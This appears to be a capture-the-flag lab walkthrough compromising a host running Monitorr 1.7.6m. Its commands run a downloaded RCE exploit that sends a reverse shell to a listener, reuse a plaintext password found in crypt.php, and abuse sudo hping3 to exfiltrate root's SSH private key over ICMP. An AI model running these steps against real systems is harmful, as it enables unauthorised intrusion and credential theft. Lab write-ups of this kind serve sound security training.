RATING
Intermediate
ENUMERATION
As usual, we start off with our nmap scan:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.250.218
Navigating to our target in a browser, we are redirected to http://192.168.250.218/mon and are met with a site running Monitorr 1.7.6m:
We take a look on searchsploit for this version of Monitorr and discover an unauthenticated remote code execution exploit, which we download:
Command: searchsploit monitorr 1.7.6m
Command: searchsploit -m 48980.py
EXPLOITATION
We run the exploit using the url of the target as well as the IP and port of our netcat listener:
Command: python3 48980.py http://192.168.250.218/mon/ 192.168.45.229 1234
Once executed, we catch our shell with our netcat listener and are logged in as user www-data:
Looking through the home directory of user fox, we find some files of interest:
Command: ls -la
Taking a look at the contents of the reminder file, we see mention of crypt.php:
Command: cat reminder
We find crypt.php inside the devel directory. Listing out its contents, we see what looks like a password, BUHNIJMONIBUVCYTTYVGBUHJNI:
Command: ls -la devel/crypt.php
Using this newly discovered password, we SSH as user fox to the target:
Command: ssh [email protected]
PRIVILEGE ESCALATION
We check for sudo privileges and see that user fox can run the binary hping3 with elevated privileges. Because we are forced to use hping3 in ICMP mode, we can’t use this to get a shell:
Command: sudo -l
We can, however, use it to transfer files (for example a private SSH key):
Command: sudo hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/.ssh/id_rsa
Setting up our receiver, we are able to extract the contents of root‘s id_rsa file:
Command: sudo hping3 --icmp 127.0.0.1 --listen signature --safe
With root‘s id_rsa in hand, we can simply use it to SSH to the target as root and read our proof.txt:
Command: chmod 600 id_rsa
Command: ssh -i id_rsa [email protected]
